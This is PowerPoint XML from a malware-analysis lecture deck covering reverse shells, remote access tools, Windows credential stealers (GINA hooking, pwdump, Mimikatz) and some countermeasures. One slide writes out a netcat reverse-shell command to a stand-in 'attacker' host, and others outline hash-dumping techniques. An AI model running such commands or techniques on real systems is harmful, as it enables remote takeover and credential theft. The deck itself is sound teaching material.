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Default Extension="jpeg" ContentType="image/jpeg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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="414" r:id="rId2"/>
    <p:sldId id="415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  <p:sldId id="430" r:id="rId18"/>
    <p:sldId id="412" r:id="rId19"/>
    <p:sldId id="350" r:id="rId20"/>
    <p:sldId id="355" r:id="rId21"/>
    <p:sldId id="360" r:id="rId22"/>
    <p:sldId id="359" r:id="rId23"/>
    <p:sldId id="431" r:id="rId24"/>
    <p:sldId id="361" r:id="rId25"/>
    <p:sldId id="432" r:id="rId26"/>
    <p:sldId id="284" r:id="rId27"/>
    <p:sldId id="362" r:id="rId28"/>
    <p:sldId id="363" r:id="rId29"/>
    <p:sldId id="433" r:id="rId30"/>
    <p:sldId id="364" r:id="rId31"/>
    <p:sldId id="365" r:id="rId32"/>
    <p:sldId id="436" r:id="rId33"/>
    <p:sldId id="437" r:id="rId34"/>
    <p:sldId id="366" r:id="rId35"/>
    <p:sldId id="367" r:id="rId36"/>
    <p:sldId id="368" r:id="rId37"/>
    <p:sldId id="371" r:id="rId38"/>
    <p:sldId id="369" r:id="rId39"/>
    <p:sldId id="434" r:id="rId40"/>
    <p:sldId id="370" r:id="rId41"/>
    <p:sldId id="408" r:id="rId42"/>
    <p:sldId id="348" r:id="rId43"/>
    <p:sldId id="352" r:id="rId44"/>
    <p:sldId id="356" r:id="rId45"/>
    <p:sldId id="353" r:id="rId46"/>
    <p:sldId id="277" r:id="rId47"/>
    <p:sldId id="358" r:id="rId48"/>
    <p:sldId id="357" r:id="rId49"/>
    <p:sldId id="438" r:id="rId50"/>
    <p:sldId id="413" r:id="rId51"/>
    <p:sldId id="354" r:id="rId52"/>
    <p:sldId id="296" r:id="rId53"/>
    <p:sldId id="374" r:id="rId54"/>
    <p:sldId id="375" r:id="rId55"/>
    <p:sldId id="376" r:id="rId56"/>
    <p:sldId id="377" r:id="rId57"/>
    <p:sldId id="301" r:id="rId58"/>
    <p:sldId id="378" r:id="rId59"/>
    <p:sldId id="379" r:id="rId60"/>
    <p:sldId id="380" r:id="rId61"/>
    <p:sldId id="305" r:id="rId62"/>
    <p:sldId id="381" r:id="rId63"/>
    <p:sldId id="382" r:id="rId64"/>
    <p:sldId id="410" r:id="rId65"/>
    <p:sldId id="411" r:id="rId66"/>
    <p:sldId id="383" r:id="rId67"/>
    <p:sldId id="384" r:id="rId68"/>
    <p:sldId id="385" r:id="rId69"/>
    <p:sldId id="386" r:id="rId70"/>
    <p:sldId id="387" r:id="rId71"/>
    <p:sldId id="388" r:id="rId72"/>
    <p:sldId id="373" r:id="rId73"/>
    <p:sldId id="317" r:id="rId74"/>
    <p:sldId id="390" r:id="rId75"/>
    <p:sldId id="405" r:id="rId76"/>
    <p:sldId id="391" r:id="rId77"/>
    <p:sldId id="392" r:id="rId78"/>
    <p:sldId id="389" r:id="rId79"/>
    <p:sldId id="394" r:id="rId80"/>
    <p:sldId id="406" r:id="rId81"/>
    <p:sldId id="395" r:id="rId82"/>
    <p:sldId id="396" r:id="rId83"/>
    <p:sldId id="393" r:id="rId84"/>
    <p:sldId id="327" r:id="rId85"/>
    <p:sldId id="398" r:id="rId86"/>
    <p:sldId id="399" r:id="rId87"/>
    <p:sldId id="400" r:id="rId88"/>
    <p:sldId id="401" r:id="rId89"/>
    <p:sldId id="402" r:id="rId90"/>
    <p:sldId id="403" r:id="rId91"/>
    <p:sldId id="407" r:id="rId92"/>
    <p:sldId id="397" r:id="rId93"/>
    <p:sldId id="404" r:id="rId9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44A2043-1C92-4E69-BFB3-5B6DC70E6E21}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Untitled Section" id="{C8265D08-4A9A-426E-AE75-99FBDE27E13D}">
          <p14:sldIdLst>
            <p14:sldId id="336"/>
            <p14:sldId id="337"/>
            <p14:sldId id="338"/>
            <p14:sldId id="259"/>
            <p14:sldId id="339"/>
            <p14:sldId id="342"/>
            <p14:sldId id="343"/>
            <p14:sldId id="263"/>
            <p14:sldId id="340"/>
            <p14:sldId id="346"/>
            <p14:sldId id="345"/>
            <p14:sldId id="341"/>
            <p14:sldId id="349"/>
            <p14:sldId id="344"/>
            <p14:sldId id="347"/>
            <p14:sldId id="351"/>
            <p14:sldId id="350"/>
            <p14:sldId id="348"/>
            <p14:sldId id="352"/>
            <p14:sldId id="356"/>
            <p14:sldId id="353"/>
            <p14:sldId id="277"/>
            <p14:sldId id="358"/>
            <p14:sldId id="357"/>
            <p14:sldId id="355"/>
            <p14:sldId id="360"/>
            <p14:sldId id="359"/>
            <p14:sldId id="361"/>
            <p14:sldId id="284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1"/>
            <p14:sldId id="370"/>
            <p14:sldId id="372"/>
            <p14:sldId id="354"/>
            <p14:sldId id="296"/>
            <p14:sldId id="374"/>
            <p14:sldId id="375"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="301"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
            <p14:sldId id="380"/>
            <p14:sldId id="305"/>
            <p14:sldId id="381"/>
            <p14:sldId id="382"/>
            <p14:sldId id="383"/>
            <p14:sldId id="384"/>
            <p14:sldId id="385"/>
            <p14:sldId id="386"/>
            <p14:sldId id="387"/>
            <p14:sldId id="388"/>
            <p14:sldId id="373"/>
            <p14:sldId id="317"/>
            <p14:sldId id="390"/>
            <p14:sldId id="391"/>
            <p14:sldId id="392"/>
            <p14:sldId id="389"/>
            <p14:sldId id="394"/>
            <p14:sldId id="395"/>
            <p14:sldId id="396"/>
            <p14:sldId id="393"/>
            <p14:sldId id="327"/>
            <p14:sldId id="398"/>
            <p14:sldId id="399"/>
            <p14:sldId id="400"/>
            <p14:sldId id="401"/>
            <p14:sldId id="402"/>
            <p14:sldId id="403"/>
            <p14:sldId id="397"/>
            <p14:sldId id="4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72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61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810D0-631F-477A-922A-F8B62AA78F42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F3A8D-4F2B-4237-B46D-05DFE455DF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68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F3E309-E188-467D-B402-212C27CC23B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83172E3B-B2A8-43F3-B0CD-E51CA2A8FC92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167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253EAB9-C234-4D15-B99C-95471D006C90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167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29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39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44AB6C-81EA-46C4-A656-7A38C0C56899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0956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3597C57F-3C78-4870-BB2F-1527B71415CC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A2CCD56C-614F-4DF5-8EB5-F08B0179C6F0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2142945" y="685631"/>
            <a:ext cx="2572110" cy="342950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109572" name="Rectangle 4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3" y="4343231"/>
            <a:ext cx="5469694" cy="4185738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48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77929D-8F69-4D72-A352-199F6641C096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2902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211D0DAC-E34A-4535-A4B3-2704A4616932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93FA7F67-C9FD-49CB-9248-AF9B3D41C453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2902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8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75455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B3404B-9EF9-4448-BB42-BD0F807B7AF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8D6EB333-DA98-4955-8535-6E6B30157B8C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E35818EA-60EC-4CE7-A615-F04AACD757BF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5235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96" y="4343230"/>
            <a:ext cx="5029008" cy="4115139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6378" tIns="37558" rIns="76378" bIns="37558"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="526"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="400827" algn="l"/>
                <a:tab pos="801654" algn="l"/>
                <a:tab pos="1202482" algn="l"/>
                <a:tab pos="1603309" algn="l"/>
                <a:tab pos="2004136" algn="l"/>
                <a:tab pos="2404963" algn="l"/>
                <a:tab pos="2805791" algn="l"/>
                <a:tab pos="3206618" algn="l"/>
                <a:tab pos="3607445" algn="l"/>
                <a:tab pos="4008272" algn="l"/>
                <a:tab pos="4409100" algn="l"/>
                <a:tab pos="4809927" algn="l"/>
                <a:tab pos="5210754" algn="l"/>
                <a:tab pos="5611581" algn="l"/>
                <a:tab pos="6012409" algn="l"/>
                <a:tab pos="6413236" algn="l"/>
                <a:tab pos="6814063" algn="l"/>
                <a:tab pos="7214890" algn="l"/>
                <a:tab pos="7615718" algn="l"/>
                <a:tab pos="8016545" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Century Gothic" pitchFamily="32" charset="0"/>
                <a:ea typeface="AR PL ShanHeiSun Uni" charset="0"/>
                <a:cs typeface="AR PL ShanHeiSun Uni" charset="0"/>
              </a:rPr>
              <a:t>Another good reason why you might want to have an outbound firewall</a:t>
            </a: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6873BC5-BF7F-4F96-B09E-CBC48140E785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34145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85493204-B511-4428-A3E8-4500EC4C032A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972959FF-6B85-4741-A3DC-65C6187AB87C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34147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8" name="Text Box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96" y="4343230"/>
            <a:ext cx="5029008" cy="4115139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8903" tIns="41030" rIns="78903" bIns="41030"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="526"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="400827" algn="l"/>
                <a:tab pos="801654" algn="l"/>
                <a:tab pos="1202482" algn="l"/>
                <a:tab pos="1603309" algn="l"/>
                <a:tab pos="2004136" algn="l"/>
                <a:tab pos="2404963" algn="l"/>
                <a:tab pos="2805791" algn="l"/>
                <a:tab pos="3206618" algn="l"/>
                <a:tab pos="3607445" algn="l"/>
                <a:tab pos="4008272" algn="l"/>
                <a:tab pos="4409100" algn="l"/>
                <a:tab pos="4809927" algn="l"/>
                <a:tab pos="5210754" algn="l"/>
                <a:tab pos="5611581" algn="l"/>
                <a:tab pos="6012409" algn="l"/>
                <a:tab pos="6413236" algn="l"/>
                <a:tab pos="6814063" algn="l"/>
                <a:tab pos="7214890" algn="l"/>
                <a:tab pos="7615718" algn="l"/>
                <a:tab pos="8016545" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Century Gothic" pitchFamily="32" charset="0"/>
                <a:ea typeface="AR PL ShanHeiSun Uni" charset="0"/>
                <a:cs typeface="AR PL ShanHeiSun Uni" charset="0"/>
              </a:rPr>
              <a:t>Part of the “idea” behind these features was accessibility tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="526"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="400827" algn="l"/>
                <a:tab pos="801654" algn="l"/>
                <a:tab pos="1202482" algn="l"/>
                <a:tab pos="1603309" algn="l"/>
                <a:tab pos="2004136" algn="l"/>
                <a:tab pos="2404963" algn="l"/>
                <a:tab pos="2805791" algn="l"/>
                <a:tab pos="3206618" algn="l"/>
                <a:tab pos="3607445" algn="l"/>
                <a:tab pos="4008272" algn="l"/>
                <a:tab pos="4409100" algn="l"/>
                <a:tab pos="4809927" algn="l"/>
                <a:tab pos="5210754" algn="l"/>
                <a:tab pos="5611581" algn="l"/>
                <a:tab pos="6012409" algn="l"/>
                <a:tab pos="6413236" algn="l"/>
                <a:tab pos="6814063" algn="l"/>
                <a:tab pos="7214890" algn="l"/>
                <a:tab pos="7615718" algn="l"/>
                <a:tab pos="8016545" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2500">
              <a:latin typeface="Century Gothic" pitchFamily="32" charset="0"/>
              <a:ea typeface="AR PL ShanHeiSun Uni" charset="0"/>
              <a:cs typeface="AR PL ShanHeiSun Uni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59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A47B4F-7A57-495F-A2ED-9AD975CDB7AB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38241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BB7F1CB3-5807-4525-945D-69E9766AD9A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12692E3-D5D5-4484-B3AF-A3B2C6992EAE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38243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4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8030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69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B53FF4-4F49-4F84-9CFE-37523602FADE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5052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A4CFA391-879F-4D56-98FF-E6153D5550F1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64281C38-DF0E-4315-9A09-83542A223277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5053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75455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79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79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98E654-E9E0-41C5-B212-C1A0BFBE14A4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160769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85337E4F-1A92-41B2-85DF-2A3B1D81096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602363E0-9348-4EF5-A79C-06C06A545AC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84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160771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8825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077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75455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85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85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86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86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87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87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88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88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89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89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90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90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91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91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92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93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93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72A4A-BDF0-47F8-8BA4-007A041F520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881208" y="8685103"/>
            <a:ext cx="2947989" cy="43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DB092F05-5F41-4B61-A95C-7747C8504769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81208" y="8685104"/>
            <a:ext cx="2949430" cy="43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r">
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{5D34ED40-22D9-455D-A7F4-E0AFBA305D9B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200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algn="r">
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200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91139" name="Rectangle 3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8875" y="693738"/>
            <a:ext cx="4549775" cy="34115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478251-6EFE-45A2-A7FA-BFFA48F35F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E1FC2-93A8-4191-B066-4C94C028A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208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6C5B5-0826-4A70-9470-CD269ECC85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6370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197920" cy="11146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55840" y="5953585"/>
            <a:ext cx="2099520" cy="44212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225600" y="5953585"/>
            <a:ext cx="2868480" cy="442127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654241" y="5953585"/>
            <a:ext cx="2099520" cy="442127"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C7D75496-EFD2-4C9C-A307-1D14D19D9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9591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7FBA-633A-4A44-9837-937990760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7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61381-DA84-486D-B9AE-68B4ED513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8618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E184-8ABF-4011-8CC5-4F0CD3205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223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4776-6710-4983-B9C4-F673DDEE0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2269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3AEB-1158-41A7-91E1-7FF7F7ADA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237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67C1-5444-4327-9247-FA5613B8B6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5243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ACA5A-49C6-4D34-9398-01A5CFDB9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3821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A1F2-8A54-4FC2-9805-3B43FBD9E0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686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14313"/>
            <a:ext cx="8410575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382000" cy="498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75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3730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735B8CC-15C8-4087-B912-AB8C448A8D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asploit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lance.com/en_us/blog/running-executables-on-macos-from-memory.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vimeo.com/215195101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62088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Part 4: Malware Functionality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581400"/>
            <a:ext cx="8458200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chapter 11: Malware Behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chapter 12: Covert Malware Launching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chapter 13: Data Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chapter 14: Malware-focused Network Signatures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21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-e eventually dropped from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not a problem…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933803"/>
            <a:ext cx="8915400" cy="3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victim$ mknod /tmp/bpipe p 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victim$ /bin/bash 0&lt;/tmp/bpipe | nc attacker 8000 1&gt;/tmp/bpipe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attacker$ nc –nvlp 8000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406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reverse shells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cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> equivalent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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CreateProcess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a socket within process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tie </a:t>
            </a:r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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of process to socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multithreaded version in book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CreateThread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CreatePipe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1880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Remote access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Allow full access to remote administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two methods as before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim listens for incoming connections from controller (easy to detect, typically blocked)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim beacons outside controller to receive instructions (harder to detect, not blocked)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: Poison Ivy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1564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Credential Stealers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 main types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programs that monitor user logins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programs that dump credentials stored in Windows (e.g. password hashes) that can be attacked off-line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programs that log keystrokes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94238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user login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Graphical Identification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aNd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Authentication (GINA) for Windows Login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dirty="0" smtClean="0"/>
              <a:t> process started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dirty="0" smtClean="0"/>
              <a:t> invokes GINA library code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msgina.dll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GINA requests credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports pluggable authentication methods (local accounts, LDAP, Windows Domain auth, Kerberos,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7304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GINA interception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FakeGINA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> sits between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msgina.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (Figure 11-2, p. 235, Loc. 5860)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>pluggability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> for supporting other means of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Configured to run by setting a Windows registry key</a:t>
            </a:r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HKLM\SOFTWARE\...\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Winlogon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GinaDLL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set to fsgina.dll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sz="2400" dirty="0" smtClean="0"/>
              <a:t> hijacking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sz="2000" dirty="0" smtClean="0"/>
              <a:t> executes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fakegina.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> requests credentials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fakegina.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> passes credentials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msgina.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Logout function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WlxLoggedOutSAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> hooked to store credentials (Listing 11-1, p. 235-236, Loc. 5874)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Original version called first, before rogue code executed</a:t>
            </a:r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267088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Dumping credentials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Password storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Typically, only hashes of passwords stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hash function well-known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Dumping hashes allows dictionary attacks since users with weak passwords subject to brute-force dictionary attacks off-line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Locations of Windows hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Security Account Manager (SAM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Local Security Authority Subsystem Service (LSASS)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688516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lsass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dumping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pwdump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/>
              <a:t>toolkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Performs DLL injection on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lsass.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (Local Security Authority Subsystem Service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Injects rogue DLL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lsaext.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Rogue DLL functions called include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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GrabHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (Listing 11-2, p. 237, Loc. 5906)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Loads library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samsrv.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to get SAM functions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SamIConnect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SamrQueryInformationUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>,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SamIGetPrivateData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3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Loads library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advapi32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to get hidden API functions for decrypting credentials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SystemFunction025</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/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SystemFunction027</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Must call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GetProcAdress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to resolve library function locations after they have been loaded at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Similar methods used in Pass-the-Hash toolkit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239471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Mimikatz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Automated credential stealing on Windows derived from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>pwdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and PSH toolkits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Also hits lsass.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Included in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Dumps memory to find</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Passwords in plaintext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Password hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Kerberos tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Counter-measures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use unique administrator account credentials to limit impact of credential theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>lsass</a:t>
            </a:r>
            <a:r>
